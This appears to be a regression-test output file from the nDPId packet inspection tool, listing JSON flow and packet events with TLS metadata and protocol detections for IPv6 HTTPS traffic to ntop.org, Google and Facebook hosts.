{"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269139219,"flow_last_seen":1448269139219,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269139219,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1448269139219,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269139219,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknYBuw4c9NoAAAAAoAJwgGsaAAACBAWgBAIIChINd8gAAAAAAQMDBw=="} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1448269139239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269139239,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGNyoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSdnTlL8YOHPTboBJvkPn2AAACBAWgBAIICgBerYcSDXfIAQMDCA=="} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1448269139239,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139239,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknYBuw4c9Nt05S\/HgBAA4WsSAAABAQgKEg13zQBerYc="} +00887{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":123,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269139219,"flow_last_seen":1448269139239,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269139239,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00944{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":125,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269139219,"flow_last_seen":1448269139263,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269139263,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269139219,"flow_last_seen":1448269139267,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269139267,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37494,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} +00606{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":135,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269139314,"flow_last_seen":1448269139314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269139314,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:1a1::eed","src_port":60124,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00499{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1448269139314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139314,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BoQAAAAAAAA7t6twBuwxnksLpg7gmgBABC+E3AAABAQgKEg134BvnLVo="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1448269139321,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269139321,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOyoCJvAArQGhAAAAAAAADu0qAA1AAAEAA3qswP\/+pw1MAbvq3OmDuCYMZ5LDgBAD0zk\/AAABAQgKG+fdWhINH94="} +00621{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":140,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269143410,"flow_last_seen":1448269143410,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269143410,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:2880:1010:3f20:face:b00c::25de","src_port":40308,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":140,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1448269143410,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269143410,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAyiAEBA\/IPrOsAwAACXenXQBu97bCAR6JAzggBADIfF3AAABAQgKEg174HFvpAM="} +00502{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1448269143539,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269143539,"pkt":"eKzApw1M9LUv\/K\/Cht1gwAAAACAGKyoDKIAQED8g+s6wDAAAJd4qAA1AAAEAA3qswP\/+pw1MAbuddHokDODe2wgFgBAAa0\/sAAABAQgKcXBUrRINT9U="} +00608{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":142,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269144306,"flow_last_seen":1448269144306,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269144306,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:400b:c02::9a","src_port":33062,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":142,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1448269144306,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144306,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAsMAgAAAAAAAACagSYBu7SkSa3RTHVvgBABRwoCAAABAQgKEg18wD9sNbI="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":143,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1448269144348,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144348,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGNSoAFFBACwwCAAAAAAAAAJoqAA1AAAEAA3qswP\/+pw1MAbuBJtFMdW+0pEmugBABd0eeAAABAQgKP2zlshINJLA="} +00609{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":144,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269144450,"flow_last_seen":1448269144450,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269144450,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":144,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1448269144450,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269144450,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkoIBuwefNhUAAAAAoAJwgGsaAAACBAWgBAIIChINfOQAAAAAAQMDBw=="} +00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":145,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1448269144475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269144475,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGNyoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSgnjE+S8HnzYWoBJvkOerAAACBAWgBAIICgBesqQSDXzkAQMDCA=="} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":146,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1448269144475,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269144475,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkoIBuwefNhZ4xPkwgBAA4WsSAAABAQgKEg186gBesqQ="} +00888{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":147,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269144450,"flow_last_seen":1448269144475,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269144475,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00945{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":149,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269144450,"flow_last_seen":1448269144502,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269144502,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +01398{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":155,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269144450,"flow_last_seen":1448269144508,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269144508,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37506,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} +00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269145458,"flow_last_seen":1448269145458,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269145458,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1448269145458,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269145458,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAS6SoBu3aemNPcvXclgBAA6hVxAAABAQgKEg194OPdWG4="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1448269145478,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269145478,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBAAQgDAAAAAAAAEBIqAA1AAAEAA3qswP\/+pw1MAbvpKty9dyV2npjUgBAA8BoIAAABAQgK494IbhIM+eU="} +00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269146905,"flow_last_seen":1448269146905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269146905,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1448269146905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146905,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z4wBuwtKuykAAAAAoAJwgNR+AAACBAWgBAIIChINf0kAAAAAAQMDBw=="} +00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269146905,"flow_last_seen":1448269146905,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269146905,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1448269146905,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146905,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z44Bu8SPrfMAAAAAoAJwgNR+AAACBAWgBAIIChINf0kAAAAAAQMDBw=="} +00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1448269146912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146912,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOyoCJvAArQGXAAAAAAAAAjYqAA1AAAEAA3qswP\/+pw1MAbvPjun6mTbEj630oBJswJfaAAACBAV8BAIIChvn+wESDX9JAQMDBQ=="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1448269146912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269146912,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z44Bu8SPrfTp+pk3gBAA4dR2AAABAQgKEg1\/Sxvn+wE="} +00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1448269146912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146912,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOyoCJvAArQGXAAAAAAAAAjYqAA1AAAEAA3qswP\/+pw1MAbvPjOjBmT8LSrsqoBJswEUcAAACBAV8BAIIChvn+wESDX9JAQMDBQ=="} +00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1448269146912,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269146912,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z4wBuwtKuyrowZlAgBAA4dR2AAABAQgKEg1\/Sxvn+wE="} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":628,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": 